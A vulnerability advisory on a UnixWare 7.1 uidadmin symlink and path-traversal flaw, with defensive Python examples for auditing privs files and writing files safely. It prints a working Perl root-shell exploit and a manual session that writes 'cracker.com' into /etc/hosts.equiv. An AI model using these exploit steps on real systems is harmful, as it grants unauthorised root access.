
Security Research

Security Vulnerabilities
UnixWare 7 uidadmin overflow vulnerability

Published: 1999-11-02
Updated: 1999-11-02

Affected systems:
SCO UnixWare 7.1
Description:
The sgid-sys program /usr/bin/uidadmin on SCO UnixWare 7.1 can be made to write to "any" file; this write access is enough to obtain root privileges.

Test method:

Warning

The following program (method) may have offensive capability and is provided only for security research and teaching. Users act at their own risk!

A warning about the uix.pl exploit:
uix.pl will overwrite /etc/security/tcb/privs with a single entry. All other
entries will be lost and thus the next time the kernel permissions table is
rebuilt, you will not be able to run any programs (as a regular user) with the
permissions they had before the reboot. I.e. ping won't work because it
doesn't gain "driver" privileges anymore.

To get around this, make sure you login immediately after reboot, execute your
rootshell and "cat /etc/security/tcb/oprivs >> /etc/security/tcb/privs", then
run "initprivs" to re-install all privileged programs.

bash-2.02$ id
uid=106(xnec) gid=1(other)
bash-2.02$ ls -la /usr/bin/uidadmin
-r-xr-s--x 1 sys sys 18012 Apr 3 1998 /usr/bin/uidadmin
bash-2.02$ ./uix.pl

* uidadmin exploit for UnixWare 7.1


/home/xnec/ui successfully compiled
/home/xnec/ui size=3760 ctime=944185049
/home/xnec/ui checksum is 16136
placing '3760:16136:944185049:%fixed,allprivs:/home/xnec/ui' into /tmp/uidata
UX:uidadmin: ERROR: mandatory field(s) missing
Exploit successful. Run /home/xnec/ui after reboot for rootshell
bash-2.02$

AFTER REBOOT:
bash-2.02$ ./ui
#


--- uix.pl ---
#!/usr/bin/perl

###########################################################
# /usr/bin/uidadmin exploit for UnixWare 7.1
# Uses a symlink exploit to add our program to a list of elevated privileges
# programs in /etc/security/tcb/privs. After reboot, $ui_dest (/home/xnec/ui
# as configured below) will be added to the list of privileged programs.
#
# Format of the privs file is as follows (ctime and size are just as
# st_ctime and st_size as described by stat(2)):
# size:checksum:time:perms:/full/path/to/prog
#
# -Brock Tellier btellier@usa.net
#
###########################################################

$ui_source = "/home/xnec/ui.c";
$ui_dest = "/home/xnec/ui";
$ui_code = "void main() { setreuid(0,0); system(\"/bin/ksh\");}";
$privloc = "/etc/security/tcb/privs";
$uidatafile="/tmp/uidata";
$sumpath = "/usr/bin/sum";
$uidata_sym = "/tmp/uidata.tmp";
$compiler = "cc";
$uidadmin = "/usr/bin/uidadmin";

###
# Path to the directory where your $uidata_sym will exist relative to
# /etc/uidata/
###
$uidadminarg = "../../tmp";


print("\n* uidadmin exploit for UnixWare 7.1 \n\n");

###
# Output $ui_code to $ui_source and compile into $ui_dest
###

open(UIS, ">$ui_source");
printf(UIS "$ui_code\n");
close(UIS);
system ("$compiler -o $ui_dest $ui_source");
if ( -e $ui_dest ) {
print("\n$ui_dest successfully compiled\n");
}
else { die "error compiling $ui_dest"; }

###
# stat $ui_dest for size in bytes and ctime (seconds since epoch)
###

$size=(stat($ui_dest))[7] || die "cannot stat $ui_dest";
$ctime=(stat($ui_dest))[10];
print("$ui_dest size=$size ctime=$ctime\n");

###
# get the checksum value for $ui_dest
###

open(SUM, "$sumpath -r $ui_dest|");
$checksum = <SUM>;          # first (only) line of "sum -r" output
close(SUM);
chomp($checksum);
@sumfields = split(' ', $checksum);   # fields: checksum, block count, path
$chksum = $sumfields[0];
$chksum =~ s/^0//;          # privs stores the checksum without a leading zero

print("$ui_dest checksum is $chksum\n");

###
# Put our entry into $uidatafile, use trailing newline
###

$uidata="$size:$chksum:$ctime:\%fixed,allprivs:$ui_dest";
print("placing '$uidata' into $uidatafile\n");
open(TMP, ">$uidatafile");
print(TMP "$uidata\n");
close(TMP);

###
# Create symlink from $uidata_sym to $privloc
###
symlink($privloc, $uidata_sym);

###
# All the preparation is done, launch the exploit
###

system("$uidadmin -S $uidadminarg -a -r bah");

###
# Find out if the exploit worked, assume it did if $ui_dest is in $privloc
###

open (PRIV, "$privloc");
@privs = <PRIV>;
close(PRIV);
foreach $priv (@privs) {
if ($priv =~ /$ui_dest/) {
print("Exploit successful. Run $ui_dest after reboot for rootshell\n");
exit(0);
}
}
print("Exploit not successful, sorry!\n");


--- /uix.pl ---
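The privs file format that uix.pl relies on (size:checksum:time:perms:/full/path/to/prog, as described in its header comment) is also what an administrator can audit after the fact. The following is an added example, not part of the advisory or of uix.pl: it parses privs-style lines, flags entries that point outside the system directories or grant allprivs, and optionally compares the recorded size and ctime with what lstat(2) reports for the program on disk. The trusted-directory list, the sample lines and the checksum values are constructed; the checksum itself is not recomputed here because that would require the exact "sum -r" algorithm of the target platform.

```python
"""Audit a UnixWare-style privs file for tampered or out-of-place entries.

Added example, not part of the advisory or of uix.pl. The line format
(size:checksum:time:perms:/full/path/to/prog) is the one described in the
uix.pl header comment; the trusted-directory list, the sample entries and
the checksum values below are constructed for this example.
"""
import os
import stat
from dataclasses import dataclass

# Constructed allowlist of directories where privileged programs are expected.
# A real audit would build it from the vendor's own privilege tables (oprivs).
TRUSTED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/sbin/", "/usr/lib/", "/etc/")

# Constructed sample: one ordinary entry (checksum made up) and the entry
# that uix.pl plants (values taken from the advisory's session transcript).
SAMPLE_PRIVS = """\
# size:checksum:time:perms:/full/path/to/prog
18012:40321:891561600:%fixed,driver:/usr/bin/uidadmin
3760:16136:944185049:%fixed,allprivs:/home/xnec/ui
"""


@dataclass
class PrivEntry:
    size: int
    checksum: int
    ctime: int
    perms: tuple
    path: str


def parse_privs(text):
    """Parse privs lines; raise ValueError on a malformed line."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Split on the first four colons only, so a ':' in the path survives.
        fields = line.split(":", 4)
        if len(fields) != 5 or not fields[4].startswith("/"):
            raise ValueError(f"line {lineno}: malformed privs entry")
        size, chksum, ctime, perms, path = fields
        entries.append(PrivEntry(int(size), int(chksum), int(ctime),
                                 tuple(perms.split(",")), path))
    return entries


def entry_from_disk(path, perms=("%fixed",), checksum=0):
    """Build an entry from lstat(2) data; the checksum is left to the caller."""
    st = os.lstat(path)
    return PrivEntry(st.st_size, checksum, int(st.st_ctime), tuple(perms), path)


def policy_findings(entry):
    """Static checks that need no access to the program itself."""
    reasons = []
    if not entry.path.startswith(TRUSTED_PREFIXES):
        reasons.append("path outside trusted directories")
    if "allprivs" in entry.perms:
        reasons.append("entry grants allprivs; review manually")
    return reasons


def disk_findings(entry):
    """Compare the recorded size and ctime with the program on disk.

    lstat() is used so a symlink planted at the recorded path is reported
    rather than silently resolved.
    """
    try:
        st = os.lstat(entry.path)
    except FileNotFoundError:
        return ["recorded program does not exist"]
    reasons = []
    if stat.S_ISLNK(st.st_mode):
        reasons.append("recorded path is a symlink")
    if st.st_size != entry.size:
        reasons.append(f"size mismatch: recorded {entry.size}, on disk {st.st_size}")
    if int(st.st_ctime) != entry.ctime:
        reasons.append(f"ctime mismatch: recorded {entry.ctime}, on disk {int(st.st_ctime)}")
    return reasons


def audit(text, check_disk=False):
    """Return {path: [reasons]} for every entry that raises a concern."""
    report = {}
    for entry in parse_privs(text):
        reasons = policy_findings(entry)
        if check_disk:
            reasons += disk_findings(entry)
        if reasons:
            report[entry.path] = reasons
    return report


if __name__ == "__main__":
    for path, reasons in audit(SAMPLE_PRIVS).items():
        print(path)
        for reason in reasons:
            print("   ", reason)
```

Run it against the constructed sample and only the /home/xnec/ui entry is reported; with check_disk=True on a real system, an entry whose size or ctime no longer matches the binary is the signature of a rebuilt file or a swapped program.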

--- for those with little patience ---

bash-2.02$ id
uid=106(xnec) gid=1(other)
bash-2.02$ ls -la /etc/hosts.equiv
UX:ls: ERROR: Cannot access /etc/hosts.equiv: No such file or directory
bash-2.02$ ls -la /usr/bin/uidadmin
-r-xr-s--x 1 sys sys 18012 Apr 3 1998 /usr/bin/uidadmin
bash-2.02$ ln -s /etc/hosts.equiv /tmp/uidata.tmp
bash-2.02$ echo "cracker.com" > /tmp/uidata
bash-2.02$ /usr/bin/uidadmin -S ../../tmp -a -r bah
UX:uidadmin: ERROR: mandatory field(s) missing
bash-2.02$ cat /etc/hosts.equiv
cracker.com
bash-2.02$ ls -al /etc/hosts.equiv
-rw-rw-r-- 1 sys sys 12 Dec 2 19:05 /etc/hosts.equiv
bash-2.02$

--- /patience ---
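Both sessions above come down to the same two defects in a privileged program: a directory argument ("-S ../../tmp") that is allowed to climb out of the program's data directory, and a final open() that follows whatever symlink was planted at the expected file name. The following is an added example, not from the advisory and not SCO's code, showing the checks a utility in uidadmin's position needs. The function names and the temporary layout (an "etc/uidata" base directory and a "hosts.equiv" target file) are constructed; the code assumes a kernel that honours O_NOFOLLOW and that O_CREAT|O_EXCL refuses to create through an existing symlink, which POSIX.1-2008 systems and Linux do.

```python
"""Write a data file under a fixed base directory without the two defects the
uidadmin advisory describes: a directory argument that escapes the base with
'..', and an open() that follows a planted symlink at the final component.

Added example, not from the advisory and not SCO's code. Names and the
temporary layout used by demo() are constructed for illustration.
"""
import errno
import os
import tempfile


class UnsafePath(Exception):
    """Raised when a caller-supplied path fails the safety checks."""


def resolve_subdir(base, relative):
    """Return base/relative, refusing '..' components and absolute paths.

    The advisory's session passes '../../tmp' as the directory argument;
    this check rejects it before any file is touched.
    """
    if os.path.isabs(relative):
        raise UnsafePath("absolute directory argument not allowed")
    parts = [p for p in relative.split("/") if p not in ("", ".")]
    if ".." in parts:
        raise UnsafePath("parent-directory traversal not allowed")
    target = os.path.join(base, *parts) if parts else base
    # Second line of defence: confirm the resolved path is still inside the
    # base once any symlinks along the way are expanded.
    base_real = os.path.realpath(base)
    if os.path.commonpath([base_real, os.path.realpath(target)]) != base_real:
        raise UnsafePath("directory argument escapes the base directory")
    return target


def write_record_safely(directory, name, data):
    """Create directory/name and write data to it.

    O_EXCL refuses to reuse any existing name (a planted symlink included)
    and O_NOFOLLOW refuses a symlink at the final component; both cases are
    reported as UnsafePath so the caller can log them.
    """
    if "/" in name or name in ("", ".", ".."):
        raise UnsafePath("bad file name")
    path = os.path.join(directory, name)
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    try:
        fd = os.open(path, flags, 0o600)
    except OSError as exc:
        if exc.errno in (errno.EEXIST, errno.ELOOP):
            raise UnsafePath(f"refusing to write through existing {path}") from exc
        raise
    with os.fdopen(fd, "w") as fh:
        fh.write(data)
    return path


def demo():
    """Exercise the checks against a constructed layout in a temp directory.

    Returns a dict of outcomes so the behaviour can be asserted on.
    """
    outcomes = {}
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "etc", "uidata")   # stands in for /etc/uidata
        os.makedirs(base)
        victim = os.path.join(tmp, "hosts.equiv")   # stands in for /etc/hosts.equiv
        with open(victim, "w") as fh:
            fh.write("original\n")
        # Traversal of the kind shown in the advisory's session.
        try:
            resolve_subdir(base, "../../tmp")
            outcomes["traversal_refused"] = False
        except UnsafePath:
            outcomes["traversal_refused"] = True
        # A symlink planted where the data file would be created.
        os.symlink(victim, os.path.join(base, "uidata.tmp"))
        try:
            write_record_safely(base, "uidata.tmp", "attacker.example\n")
            outcomes["symlink_refused"] = False
        except UnsafePath:
            outcomes["symlink_refused"] = True
        with open(victim) as fh:
            outcomes["victim_untouched"] = fh.read() == "original\n"
        # A fresh name inside the base directory is written normally.
        written = write_record_safely(base, "uidata.new", "ok\n")
        with open(written) as fh:
            outcomes["fresh_write_ok"] = fh.read() == "ok\n"
    return outcomes


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The realpath check in resolve_subdir is deliberately redundant with the '..' filter: the filter gives a clear error for the obvious case, while the realpath comparison also catches a base directory component that has itself been replaced by a symlink. O_EXCL means the program never overwrites an existing file at that name at all, which is the right default for a temporary data file.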


Recommendation:
None at this time.

This vulnerability notice was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.